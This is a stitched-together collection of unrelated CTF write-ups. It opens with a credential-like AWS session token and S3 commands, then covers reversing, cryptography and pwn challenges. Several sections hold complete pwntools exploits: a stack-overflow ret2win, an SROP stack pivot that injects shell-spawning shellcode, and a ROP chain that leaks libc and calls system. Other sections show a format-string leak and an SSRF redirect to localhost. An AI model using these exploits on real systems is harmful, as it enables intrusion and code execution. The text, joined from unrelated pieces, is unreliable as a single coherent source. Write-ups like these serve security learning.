IQoJb3JpZ2luX2VjENv//////////wEaCXVzLWVhc3QtMiJGMEQCIFd6LuJOjobgZjh3mLzcaNRMfrj3IzYMu/ctp6kSjkXBAiAf6hJRboSfU/d+mdkHH7nPw5keWX56tItL7Hz/Jj0trCq9Awjk//////////8BEAAaDDkwOTU3MjA2NDY3MiIMVOz7BRPs6XGpzw7FKpEDSK1iukNv81xXM9XYweVjL8l6byW/kZRt8W1EAz/wTBhmpyYv7aDg+dz0h5JpMpmz3LvKWSwZ6qFOkMLb2o0QI1JFuUkp8VM4sQN+BuH39M/bvwijoI+5pTiNydLy7RjBZCUvBykEwnxWdAG9wQBHfOnxU3DRH7KHu3fymKNJWkdrHA8O1KX70Ne5uV0azdWxRjOTQLT2kFvpU/RrGMthPu0S2E0digRDUYyzQ5c4PTfq4jO5VLG7UvsGC79NV/hzUY9fe7k7cyUhNjLMDOVjd0ZzLk8D7oIxEx7x8cj2gxSXyQIoKqKiqy9AmhbfOjhH8bN8n+E+e4K/5yoNgqUWFShmzkB04ZoLF3iGgSV1Sx3lWPwWA40/33xOVne0e5L/Q16HkCtR9AmAh0PgY8IYX5OesETg4LRMtP/jMsNXMACu7a+TiIQprIsdQP+g0uQ+yKzC29cTCRqYn2P+39G4TeVbjEGTcQXgSCUeO1Ea2zLiopVJiBuQF3w7ZtsdDnbmrNL7pNJ2ASAmYlVzl5szItcw+9/RgQY67AFwqcUNILHazCUyzuSaXyrxEAZrDuo86CA2DOgneaPXdcZgZy4ZcT5UaZZNLAG0NLkFQBw5WXtLeQ61FEx0x6oSuerMUGpM6R5qaJlpOD0I2dr2eyHh77GiCUfYAKCHl37bMPFHhXBcRNwv0yoKF5fsiuWDV5q4pv8qJSyjbVyxlS/TE6/hztmkYCr/7IqV+SFAceTczkISYdyWMdPco69/mxcuAHwaWwQrMEhfVpUa9GuALJVUINDaNJS/vbeYhE8BCMR4D4JYzhEn67/qUhZ00fRm9usj1kF2P9D+lWq9RYbTQEPwTUMOfg5BTA==``` ```$ aws s3 ls2021-01-12 11:37:04 secretdocs $ aws s3 ls secretdocs2021-01-12 13:22:24 241 leviathan.txt $ aws s3 cp s3://secretdocs/leviathan.txt leviathan.txtdownload: s3://secretdocs/leviathan.txt to ./leviathan.txt $ cat leviathan.txtno sound, once made, is ever truly lostin electric clouds, all are safely trappedand with a touch, if we find themwe can recapture those echoes of sad, forgotten warslong summers, and sweet autumns flag{cl0udy_with_a_chance_0f_flag5}``` ??
This challenge was the second challenge of Reverse of the Da Vinci Code CTF. Giving a string to the binary returned a sort of md5 hash but not totally Example :./crackme a61267769e299c331a8b6f1c0b975c10cNice try And this hashed value was compared with d2862c3379cbf547d317b3b1771a4fb6 So, i tryed (without really reading what the binary do) to modify hex code of the binary to pass the condition comparing the hash of the input and d2862c3379cbf547d317b3b1771a4fb6 , but it just gave Well done! flag: dvCTF{a} So i decided to disassemble with Ghidra printf("Well done! flag: dvCTF{%s}\n",param_2[1]) So the only way to have the flag is to find what string - once encoded - gives d2862c3379cbf547d317b3b1771a4fb6For that, I tryed to hash in md5 a and compared to the result of the binaryResultat of the binary with 'a' in input:61267769e299c331a8b6f1c0b975c10cMD5 hash of 'a' :0cc175b9c0f1b6a831c399e269772661 I saw that las byte of the binary were 0c, like the first of the md5 of a .. so I reversed the md5 d2862c3379cbf547d317b3b1771a4fb6from d2862c3379cbf547d317b3b1771a4fb6givingb64f1a77b1b317d347f5cb79332c86d2the md5 reverse of it was741852963 Giving 741852963 to the binary :Well done! flag: dvCTF{741852963}
# Format me - DaVinciCTF - Category: Pwn- Points: 90- Solves: 47- Solved by: drw0if ## Description `nc challs.dvc.tf 8888` ## Solution When we connected to the service we reached a command line service which reverse the input we provide. Since the challenge name reminds us about format string we attempted to leak informations:```%x %d %x``` No particular output is provided... Let's try to puts it in reverse order:```x% d% x%``` Boom, format string exploit confirmed! We sprayed some `%{i}$s` to leak all the string pointed by stack values and we got the flag.
#### Emoji Encryption 659 Points> I came up with this rad new encryption. Bet no one can break it☂️🦃🔥🦁🍎🎸{🐘🥭🧅🤹🧊☀️_💣🐘_🌋🐘🌈☀️🍎🦃🧊🦁🐘}Hint: There’s a method to the madness. Find the pattern to how I encrypted, and you’ll be able to decrypt. (I suggest start by focusing on the part you already know how to decrypt) The hint suggests that we should decrypt the prefix to the flag utflag.Just take the first letter of each object that is displayed on the emoji ☂️🦃🔥🦁🍎🎸{🐘🥭🧅🤹🧊☀️_💣🐘_🌋🐘🌈☀️🍎🦃🧊🦁🐘} utflag{emojis_be_versatile} Flag: **utflag{emojis_be_versatile}**
## SolutionPNG files are made up of multiple chunks, each with the following format:```+-------------------------------------------------+| length (4B) | type (4B) | data (var) | crc (4B) |+-------------------------------------------------+``` Viewing the PNG in a hex editor, the first few chunks meet this specification. After the `pHYs` chunk something is wrong. The last byte of the `pHYs` chunk's CRC occurs at offset 0x52. 0x53 through 0x56 should be the length of the next chunk, but it is a very large number. Also, 0x57 through 0x5a are not a known chunk type. However, a few bytes ahead appears to be a valid `IDAT` chunk - maybe there are extra bytes between the chunks? Removing `6d 08 60 97 27 ff` results in the `IDAT` chunk aligning as expected. If we continue to the end of the next section, we will find the same problem. `fix_png.py` will parse the PNG and remove the bytes between the chunks, resulting in: ![`fixed.png`](https://malcrypt.gitlab.io/blog/ctfs/2021/tenable/images/fix_me/fixed.png) ## Flag**flag{hands_off_my_png}**
# NahamCon CTF 2021 ## Ret2basic [easy] > Author: @M_alpha#3534>> Can you ret2win? >> [ret2basic](ret2basic) Tags: _pwn_ _x86-64_ _bof_ _rop_ _ret2win_ ## Summary _Very_ basic _ret2win_. ## Analysis ### Checksec ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)``` No PIE and no canary, ripe for _rop_ and _bof_. ### Decompile with Ghidra ```cvoid vuln(void){ char local_78 [112]; printf("Can you overflow this?: "); gets(local_78); return;}``` Yeah, so, _gets_. From `man gets`: > Never use `gets()`. Because it is impossible to tell without knowing the data in advance how many characters `gets()` will read, and because `gets()` will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use `fgets()` instead. From `gcc` (without `-Wall` :-): ```foo.c:(.text+0x39): warning: the `gets' function is dangerous and should not be used.``` > _Always_ use `-Wall` and _always_ heed it's advice. The buffer `local_78` is `0x78` bytes from the return address, so write `0x78` bytes of garbage followed by the `win` function: ```cvoid win(void){ FILE *__stream; long lVar1; char *__s; __stream = fopen("flag.txt","r"); if (__stream == (FILE *)0x0) { puts("Failed to open the flag file."); exit(1); } fseek(__stream,0,2); lVar1 = ftell(__stream); rewind(__stream); __s = (char *)malloc((long)(int)lVar1); if (__s == (char *)0x0) { puts("Failed to allocate memory."); exit(1); } fgets(__s,(int)lVar1,__stream); fclose(__stream); puts("Here\'s your flag."); puts(__s); free(__s); exit(0);}``` With `win`, there's really nothing to do, but _win_. ## Exploit ```python#!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./ret2basic') if args.REMOTE: p = remote('challenge.nahamcon.com', 30551)else: p = process(binary.path) payload = b''payload += 0x78 * b'A'payload += p64(binary.sym.win) p.sendlineafter('?: ',payload)p.stream()p.close()``` Output: ```bash# ./exploit.py REMOTE=1[*] '/pwd/datajerk/nahamconctf2021/ret2basic/ret2basic' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to challenge.nahamcon.com on port 30551: DoneHere's your flag.flag{d07f3219a8715e9339f31cfbe09d6502}```
# Andra ## The brief ```You know what to do. :)``` ## apktool I downloaded `apktool` and ran it against the `andra.apk` file. Next I navigated through the files to `smali/com/example/hack_the_app/`. Here we have some `smoli` files, they are not great to read, but I tried. Two really stood out to me, `MainActivity.smoli` and `flag.smoli`. Flag had nothing I could understand, but MainActivity:``` const-string v0, "login_btn" .line 30 invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->throwUninitializedPropertyAccessException(Ljava/lang/String;)V :cond_0 new-instance v0, Lcom/example/hack_the_app/MainActivity$onCreate$1; const-string v1, "Nahamcom" const-string v2, "pink_panther@786" invoke-direct {v0, p0, v1, v2}, Lcom/example/hack_the_app/MainActivity$onCreate$1;-><init>(Lcom/example/hack_the_app/MainActivity;Ljava/lang/String;Ljava/lang/String;)V check-cast v0, Landroid/view/View$OnClickListener; invoke-virtual {p1, v0}, Landroid/widget/Button;->setOnClickListener(Landroid/view/View$OnClickListener;)V return-void```Clearly visible login creds! `jadx` next up ## jadx Again I downloaded the tool `jadx` and gave it `andra.apk`: ![files](./files.png) Looking at the `flag` class I concluded that I'll have to install the app on my phone and run it: ![flag_func](./flag_func.png) So I allowed 3rd party installs on my phone and did just that. ## Getting the flag After the install I just ran the app: ![input](./input.jpg) And we have the credentials! `Nahamcom:pink_panther@786` ![flag](./flag.jpg) Voila
# Another APK.... with a surprise First we try the app on the phone. Damn, we need a 4 digits pin.... We could just brute force it right? Okay, it's been a few mobile problems now, we got the handle of unpacking APKs and looking at files. We find the following interesting function: ```function b() { var t; (0, o.default)(this, b); for (var n = arguments.length, l = new Array(n), u = 0; u < n; u++) l[u] = arguments[u]; return (t = v.call.apply(v, [this].concat(l))).state = { output: 'Insert the pin to get the flag', text: '' }, t.partKey = "pgJ2K9PMJFHqzMnqEgL", t.cipher64 = "AA9VAhkGBwNWDQcCBwMJB1ZWVlZRVAENW1RSAwAEAVsDVlIAV00=", t.onChangeText = function(n) { t.setState({ text: n }) }, t.onPress = function() { var n = p.Base64.toUint8Array(t.cipher64), o = y.sha256.create(); o.update(t.partKey), o.update(t.state.text); for (var l = o.hex(), u = "", c = 0; c < n.length; c++) u += String.fromCharCode(n[c] ^ l.charCodeAt(c)); t.setState({ output: u }) }, t}``` We immidiatly notice the XOR based encryption: ```for (var l = o.hex(), u = "", c = 0; c < n.length; c++) u += String.fromCharCode(n[c] ^ l.charCodeAt(c));``` which can be reversed by using the rule ``` a = b ^ c <=> b = a ^ c``` since we have the keys.Wait, what am I saying? All we need to do is run a similar code with similar key / cipher and try all the pins. I decided to write a javascript code that would help go through that. I later realized that I could have used the "crypto" module (I didn't know this was a thing). But here is my raw solution: ```// string to base64function s2b(s) { return Buffer.from(s).toString('base64')} // base64 to stringfunction b2s(s) { return Buffer.from(s, 'base64').toString();} // array buffer wrapperfunction _base64ToArrayBuffer(base64) { var binary_string = b2s(base64); var len = binary_string.length; var bytes = new Uint8Array(len); for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); } return bytes.buffer;} // string buffer wrapperfunction _stringToArrayBuffer(s) { var len = s.length; var bytes = new Uint8Array(len); for (var i = 0; i < len; i++) { bytes[i] = s.charCodeAt(i); } return bytes.buffer;} // apply on pinfunction decode(pin) { cipher64 = "AA9VAhkGBwNWDQcCBwMJB1ZWVlZRVAENW1RSAwAEAVsDVlIAV00=" partKey = "pgJ2K9PMJFHqzMnqEgL" + pin // you can get the sha256 function from https://geraintluff.github.io/sha256/ partKeySHA256 = sha256(partKey) cipherBuff = new Uint8Array(_base64ToArrayBuffer(cipher64)) keyBuff = new Uint8Array(_stringToArrayBuffer(partKeySHA256)) out = "" // don't forget to module when you loop for (var i = 0; i < 38; i++) { code = cipherBuff[i] ^ keyBuff[i % keyBuff.length] out += String.fromCharCode(code) } return out} // try all combinations// ignore why i used 4 for-loops// just to finish quickly reallyfor (let a = 0; a < 10; a++) for (let b = 0; b < 10; b++) for (let c = 0; c < 10; c++) for (let d = 0; d < 10; d++) { pin = String(a) + String(b) + String(c) + String(d) out = decode(pin) if (out.includes("flag{")) console.log("PIN", pin, out) } ``` and the output (with a filter on "lag" instead of "flag{" just to make the write-up look nicer :D): ```PIN 0804 c:46-4d55k3;4;lagn7f55b>?g022e6i50g63PIN 3472 flag,454c;ec>7o4oaogfd9=c`7`1<0?`ac9o(PIN 4304 bl`f,6>;7>e3f2lagd5``c9=?66b73e82fb1g~PIN 4784 flag{06754e57e02b0c505149cd1055ba5e0b} ← ← ←PIN 5403 6lagz714go4gba:be3o5ed68:dk7a<4mgccf4{PIN 5464 6kcg)7?23lagde1f4obned45mf0ec<3j2o3bn|PIN 7882 9lag-gb5fi05>a0bnf4oh0d4idjb5fbl;40ef}PIN 8301 e7d:}047co>7?6<12aa0clc<mlagf`g9fed8o}PIN 8527 cng4z71e4<d5b2=55f07dae8jlagcf387f644{PIN 9172 8im:z25:g?4640>dog5`2fe=laga2ebk;c3cg/PIN 9948 6600 g20e:a52e15f`7gf22h>532bg2lag066+``` I could have been done it more easily (thanks @tkiela#8295, their solution below) ```const crypto = require("crypto"); const partKey = "pgJ2K9PMJFHqzMnqEgL";const pad = "AA9VAhkGBwNWDQcCBwMJB1ZWVlZRVAENW1RSAwAEAVsDVlIAV00=";const pad64 = Buffer.from(pad, "base64");for (var i = 0; i <= 9999; i++) { const sha256 = crypto.createHash("sha256"); hash.update(partKey); hash.update(${i}); for (var l = hash.digest("hex"), u = "", c = 0; c < pad64.length; c++) u += String.fromCharCode(pad64[c] ^ l.charCodeAt(c)); if (u.includes("flag")) { console.log("PIN:", i); console.log(u); }}``` Nice challenge overall! Technically could have ran a robot on the emulator and then let it try all pins (I'm kidding don't worry), but this taught me a bit more about crypto!
# NahamCon CTF 2021 ## Some Really Ordinary Program [medium] > Author: @M_alpha#3534>> I'm starting to get pretty good at this whole programming thing. Here's a basic program I wrote that will echo back what you say. >> [some-really-ordinary-program](some-really-ordinary-program) Tags: _pwn_ _x86-64_ _bof_ _srop_ ## Summary _Some Really Ordinary Program_ isn't an overstatement, this is the 3rd _and 4th_ time I've solve this same problem in 2021. The _and 4th_ comes from this problem being nearly identical to a similar problem from another CTF that ran at the same time as this CTF. I'm not complaining, just reporting. Anyway, the short of it is, we have nearly nothing to work with but a `read` and `syscall` gadget; using the return value from `read` we can use that to set `rax` so that we can use _srop_. These 3rd and 4th iterations of this problem in 2021 have up'd the game a bit requiring stack relocating to a known location for some easy shellcode injection. ### Update Apparently 2 _srops_ was the intended solution; from Discord (post CTF): > M_alpha: Sorry to everyone who asked if the bss was rwx on Some Really Ordinary Program I didn't know what kernel version GCP was running it was intended to just use SROP to pivot the stack to the bss and SROP again to get a shell I guess this write-up is an _unintended_ solution. I created [exploit2.py](exploit2.py) after the CTF to illustrate the intended solution. ## Analysis ### Checksec ``` RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments``` No mitigations, choose your own adventure--_assuming you can find the bits you need._ ### <strike>Decompile with Ghidra</strike> Disassemble with `objdump` ```assembly 401000: 48 89 f2 mov rdx,rsi 401003: 48 89 fe mov rsi,rdi 401006: b8 00 00 00 00 mov eax,0x0 40100b: 48 89 c7 mov rdi,rax 40100e: 0f 05 syscall 401010: c3 ret 401011: 48 89 f2 mov rdx,rsi 401014: 48 89 fe mov rsi,rdi 401017: b8 01 00 00 00 mov eax,0x1 40101c: 48 89 c7 mov rdi,rax 40101f: 0f 05 syscall 401021: c3 ret 401022: 55 push rbp 401023: 48 89 e5 mov rbp,rsp 401026: 48 81 ec f4 01 00 00 sub rsp,0x1f4 40102d: 48 bf 00 20 40 00 00 movabs rdi,0x402000 401034: 00 00 00 401037: be 1f 00 00 00 mov esi,0x1f 40103c: e8 d0 ff ff ff call 0x401011 401041: 48 8d 3c 24 lea rdi,[rsp] 401045: be 20 03 00 00 mov esi,0x320 40104a: e8 b1 ff ff ff call 0x401000 40104f: 48 8d 3c 24 lea rdi,[rsp] 401053: 48 89 c6 mov rsi,rax 401056: e8 b6 ff ff ff call 0x401011 40105b: c9 leave 40105c: c3 ret 40105d: e8 c0 ff ff ff call 0x401022 401062: eb f9 jmp 0x40105d``` Yep, that's all of it. Loading this up in GDB and running with `starti` you can quickly see that `main` is at `0x401022`, and that functions `0x401000` and `0x41011` are simple fronts to `read` and `write`. Starting from `main` (`0x401022`), `0x1f4` bytes of stack is allocated, then a string pointer (`0x402000`) and its length are _moved_ into `rdi` and `esi`, then `write` (`0x401011`) is called. This emits to your terminal: `What you say is what you get.\n`. Next `read` (`0x401000`) is called with parameters _stack_ and `0x320` for the location and length. Well there's your problem. The stack was allocated for `0x1f4` and `read` is instructed to read up to `0x320` bytes creating a _bof_ vulnerability. The next set of lines just emit to your terminal whatever you inputted, then we start all over again by calling `main`. > I guess I may have _jumped_ ahead of myself, the entry point is actually at the bottom at `0x40105d`, this calls `main`, than then jumps back to calling `main` in a loop. That's all there is folks. Not a lot here. No GOT, very few gadgets, no libc, etc..., total _srop_ fodder. ```[ Legend: Code | Heap | Stack ]Start End Offset Perm Path0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x some-really-ordinary-program0x0000000000401000 0x0000000000402000 0x0000000000001000 r-x some-really-ordinary-program0x0000000000402000 0x0000000000403000 0x0000000000002000 rwx some-really-ordinary-program0x00007ffff7ffa000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rwx [stack]0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]``` Before getting into the _srop_ details, lets look at the memory map. Other than the stack, there is a 4K page of memory that is also `RWX` at `0x402000`. This is something we both have and _know_. The attack is pretty simple, use `read` to _read_ in `0xf` bytes, so that `rax` is `0xf` (rt_sigreturn syscall). Then call `syscall` followed by our sigreturn frame. That frame will change `rsp` to the end of page `0x402000` (remember stacks grow _down_ in address space), and then set `rip` to `main`. This will basically start us all over again, but this time we know the stack address because we _set_ it. Since we can _read_ and we know _where_ we will be storing that input, we can just send some shellcode to do the rest. ## Exploit ```python#!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./some-really-ordinary-program')binary.symbols['main'] = 0x401022binary.symbols['midread'] = 0x401006 if args.REMOTE: p = remote('challenge.nahamcon.com', 31225)else: p = process(binary.path)``` Standard pwntools header with some symbols added for `main` and `midread`. > `midread` is the midpoint of the `read` frontend function described above. Since all the registers are correct except for `rax` and `rdi`, it was only necessary to get the tail end of that function. ```pythonsyscall = next(binary.search(asm('syscall')))stack = 0x402ff8 frame = SigreturnFrame()frame.rsp = stackframe.rip = binary.sym.main``` Find a syscall gadget and setup the location of our new stack at the end of page `0x402000`, then define our rt_sigreturn frame with `rsp` pointing to our new stack and `rip` pointing to `main` ```python# overflow buffer# get control of RIP# call the read function to get 0xf in rax for syscall# sigretpayload = b''payload += (0x1f4 + 8) * b'A'payload += p64(binary.sym.midread)payload += p64(syscall)payload += bytes(frame) p.sendafter('.\n',payload)``` The payload just needs to fill up the `0x1f4` byte buffer plus 8 bytes for the `push rbp`, then call `midread` followed by `syscall` and our frame. ```python# with read called, get 0xf in raxp.send(constants.SYS_rt_sigreturn * b'A')``` With the payload now running we need to send `0xf` bytes so that `read` will return with `0xf` in `rax`. After that the rt_sigreturn syscall will kick in and update all the registers with values from our frame, including the new stack (`rsp`) and where we should start executing again (`rip`). ```python# new stack that we know address of and its NX# just put in some shell code and call itpayload = b''payload += asm(shellcraft.sh())payload += (0x1f4 + 8 - len(payload)) * b'A'payload += p64(stack - 0x1f4 - 8) p.sendafter('.\n',payload) # take out the garbagep.recvuntil(p64(stack - 0x1f4 - 8))p.interactive()``` Here we are again, at the beginning, all that has changed is we _know_ where the stack is. This time we inject some shellcode, pad, and then replace the return address with the location of our shellcode. The _take out the garbage_ just receives back our payload from the `write` that `main` calls after the `read` to prettify our output for this writeup. Output: ```bash# ./exploit.py REMOTE=1[*] '/pwd/datajerk/nahamconctf2021/ordprog/some-really-ordinary-program' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments[+] Opening connection to challenge.nahamcon.com on port 31450: Done[*] Switching to interactive mode$ iduid=1000(challenge) gid=1000 groups=1000$ cat flag.txtflag{175c051dbd3db6857f3e6d2907952c87}```
# NahamCon CTF 2021 ## Rock Paper Scissors [medium] > Author: @M_alpha#3534>> How about a friendly game of rock-paper-scissors? >> [rps](rps) [libc-2.31.so](libc-2.31.so) Tags: _pwn_ _x86-64_ _bof_ _rop_ _format-string_ _scanf_ ## Summary A `read` statement is allowed to overshoot its buffer by one, allowing an attacker to change the LSB of a pointer from static format string `%d` to static format string `%s`. This then opens up a classic `scanf` `%s` buffer overflow. ## Analysis ### Checksec ``` Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)``` No PIE and no canary, ripe for _rop_ and _bof_. No GOT attacks however, _gotta_ use what we _got_. ### Decompile with Ghidra ```cvoid FUN_00401313(void){ int iVar1; time_t tVar2; int local_14; int local_10; char local_9; local_9 = '\x01'; tVar2 = time((time_t *)0x0); srand((uint)tVar2); while (local_9 != '\0') { iVar1 = rand(); local_10 = iVar1 % 3 + 1; FUN_004012c9(); __isoc99_scanf(PTR_DAT_00404028,&local_14,&local_14); getchar(); if (local_10 == local_14) { puts("Congrats you win!!!!!"); } else { puts("You lose!"); } putchar(10); printf("Would you like to play again? [yes/no]: "); read(0,&DAT_00404010,0x19); iVar1 = strcmp("no\n",&DAT_00404010); if (iVar1 == 0) { local_9 = '\0'; } else { iVar1 = strcmp("yes\n",&DAT_00404010); if (iVar1 == 0) { local_9 = '\x01'; } else { puts("Well you didn\'t say yes or no..... So I\'m assuming no."); local_9 = '\0'; } } memset(&DAT_00404010,0,4); } return;}``` `FUN_00401313` is the vulnerable function, specifically the line `read(0,&DAT_00404010,0x19)`, that reads up to `0x19` (25) bytes into global `DAT_00404010` (which is only 24 bytes length), that can then be used to overwrite the LSB of global `PTR_DAT_00404028`. By default `PTR_DAT_00404028` is pointing to a static string `%d`, by changing the last byte to `0x08` we can now have it point to the static string `%s`. > Load this up in Ghidra and look around, you'll see it. With a 2nd pass and `%s` setup for `scanf` we can simply overflow the buffer. ## Exploit Standard fare pwntools: ```python#!/usr/bin/env python3 from pwn import * binary = context.binary = ELF('./rps')binary.symbols['rps'] = 0x401313 if args.REMOTE: p = remote('challenge.nahamcon.com', 31004) libc = ELF('./libc-2.31.so')else: p = process(binary.path) libc = binary.libc``` ```pythonp.sendlineafter('[y/n]: ','y')p.sendlineafter('> ','1') # move pointer from %d to %spayload = b'yes\n\0' + (0x19 - 5 - 1) * b'A' + p8(0x8)p.sendlineafter('[yes/no]: ',payload)``` > Given how the random numbers here are 100% predictable, it would be easy to determine how to win each round, but that isn't what we are here to win, just pick _rock_ each time and move on. When prompted to play again, clearly `yes\n` is the answer, followed by `\0`, some padding, and a `0x8` as the 25th byte to change the pointer used for the format-string from `%d` to `%s`. ```pythonpop_rdi = next(binary.search(asm('pop rdi; ret'))) payload = b''payload += 0x14 * b'A'payload += p64(pop_rdi)payload += p64(binary.got.puts)payload += p64(binary.plt.puts)payload += p64(binary.sym.rps) p.sendlineafter('> ',payload)p.sendlineafter('[yes/no]: ','no') _ = p.recv(6)puts = u64(_ + b'\0\0')libc.address = puts - libc.sym.putslog.info('libc.address: ' + hex(libc.address)) payload = b''payload += 0x14 * b'A'payload += p64(pop_rdi+1)payload += p64(pop_rdi)payload += p64(libc.search(b"/bin/sh").__next__())payload += p64(libc.sym.system) p.sendlineafter('> ',payload)p.sendlineafter('[yes/no]: ','no')p.interactive()``` Round two is just like every other babyrop: leak libc, compute location of libc, loop back to vuln function, then call `system`. Output: ```bash# ./exploit.py REMOTE=1[*] '/pwd/datajerk/nahamconctf2021/rps/rps' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)[+] Opening connection to challenge.nahamcon.com on port 31004: Done[*] '/pwd/datajerk/nahamconctf2021/rps/libc-2.31.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled[*] libc.address: 0x7f2f14cbd000[*] Switching to interactive mode$ iduid=1000(challenge) gid=1000 groups=1000$ cat flag.txtflag{93548e97b8c15400117891070d84e5cc}```
## SolutionViewing the provided PNGs in a hex editor we see that they each have a valid header, but the pixel data appears to be noise. This is a common CTF challenge: the two PNG files are XORed with the same key. If we XOR the pixels of the provided files together we will have an image that is a composite of the original PNG pixels. The provided images can be expressed as: ![](https://chart.googleapis.com/chart?cht=tx&chl=C_{1}%20%3D%20P_{1}%20\oplus%20K) ![](https://chart.googleapis.com/chart?cht=tx&chl=C_{2}%20%3D%20P_{2}%20\oplus%20K) where ![]({{ equation }}C_{n}) is the encrypted pixels, and ![]({{ equation }}P_{n}) is the original PNG pixels. Based on the nature of XOR, any value XORed with itself is `0`, and any value XORed with `0` is itself. From this we can write the equation as: ![](https://chart.googleapis.com/chart?cht=tx&chl=C_{1}%20\oplus%20C_{2}) ![](https://chart.googleapis.com/chart?cht=tx&chl=P_{1}%20\oplus%20K%20\oplus%20P_{2}%20\oplus%20K) ![](https://chart.googleapis.com/chart?cht=tx&chl=P_{1}%20\oplus%20K%20\oplus%20K%20\oplus%20P_{2}) ![](https://chart.googleapis.com/chart?cht=tx&chl=P_{1}%20\oplus%200%20\oplus%20P_{2}) ![](https://chart.googleapis.com/chart?cht=tx&chl=P_{1}%20\oplus%20P_{2}) As we see, the key is cancelled out from the equation, resulting in the XOR of the original pixels from each image. This results in a blend of the two images that can usually be viewed to see the contents of the original images. `gmic` can be used to quickly XOR the PNG pixels of the two images with the command `gmic crypted1.png crypted2.png -blend xor -o xor.png`. The resulting image contains the flag: ![](https://malcrypt.gitlab.io/blog/ctfs/2021/tenable/images/secret_images/xor.png) ## Flag**flag{otp_reuse_fail}**
Highlevel details=================1. Using the `secp256k1` curve, the `EllipticCurveKeyExchange` class has a private key (```random.randint``` to get an integer in the order of the curve) and a public key (which is a known point `G` multiplied by the private key).2. The `send_public` method simply outputs the public key's coordinates.3. The `receive_public` method receives JSON data representing a point and then saves the point as the `recieved` member. It will also extract a nonce integer from the JSON and will keep the nonce as the `nonce` member.4. The `get_shared_secret` method validates the nonce is at least 65-bit wide, and then calculates the key: `(received*private).x ^ nonce`.5. The `send_fingerprint` method publishes SHA256 of the shared key.6. The `check_fingerprint` gets a fingerprint and validates that it's equal to own's key SHA256.7. Finally, the `encrypt_flag` method does an AES-CBC cipher. It uses random 16 bytes as the IV (from `os.urandom`) and the first 16 bytes from the SHA1 digest of the shared key as the AES key. Obviously, the goal is abusing the `nonce` and the `received` point to get a known key.The shared secret is calculated as such:```shared_secret = (received * private).x ^ nonce``` So, if we set `received = G`, we effectively set the shared secret to `public.x ^ nonce` (due to the multiplication of the point with `private`).We can control difference `nonce` values for Alice and Bob to coordinate the secret. Sending to Bob==============1. At this point we do not know Bob's public key.2. Set `recevied=G` and `Nonce` to be `2**65` (just to be over 64 bits).3. This makes the shared secret: `bob.public.x ^ 2**65`. Sending to Alice================1. At this point we know everyone's public keys.2. Set `received=G`, so now we must satisfy: `alice.public.x ^ n = bob.public.x ^ 2**65`, where `n` is the Nonce sent to Alice from Bob.3. The solution is `n = bob.public.x ^ alice.public.x ^ 2**65`. Solution code=============```pythonimport json, hashlib from Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpadfrom Crypto.Util.number import getPrime, long_to_bytes from fastecdsa.curve import secp256k1from fastecdsa.point import Point CURVE = secp256k1ORDER = CURVE.qG = CURVE.G DUMMY_NONCE = 2**65 alice_pub = json.loads(input('alice.pub?'))print('{"Px": %d, "Py": %d, "nonce": %d}' % (G.x, G.y, DUMMY_NONCE)) bob_pub = json.loads(input('bob.pub?'))shared_secret = bob_pub['Px'] ^ DUMMY_NONCEalice_nonce = bob_pub['Px'] ^ alice_pub['Px'] ^ DUMMY_NONCEprint('{"Px": %d, "Py": %d, "nonce": %d}' % (G.x, G.y, alice_nonce)) aes_key = hashlib.sha1(long_to_bytes(shared_secret)).digest()[:16]aes_data = json.loads(input('aes.data?'))aes_iv = bytes.fromhex(aes_data['iv'])cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)ciphertext = bytes.fromhex(aes_data['encrypted_flag'])print(cipher.decrypt(ciphertext))```I ended up with the flag: `union{https://buttondown.email/cryptography-dispatches/archive/cryptography-dispatches-the-most-backdoor-looking/}`
# Cached Web In this challenge we are required to bypass localhost check to get the flag. Those checks can be seen on the Figure 1. ![](https://raw.githubusercontent.com/kukuxumushi/HTBxUNI-CTF-quals-writeups/master/pictures/2021-03-07-22-23-31.png) Figure 1 – Localhost checks As the service uses a browser to open the incoming links, we can create a redirect on our page, pointing to http://127.0.0.1:1337/flag and get the flag. We created a page on http://nghost.spbctf.com/red.php, got path to the screenshot and the flag itself. This screenshot can be seen on the Figure 2. ![](https://raw.githubusercontent.com/kukuxumushi/HTBxUNI-CTF-quals-writeups/master/pictures/2021-03-07-22-23-37.png) Figure 2 – Screenshot of received picture Flag: HTB{pwn1ng_y0ur_DNS_r3s0lv3r_0n3_qu3ry_4t_4_t1m3}.
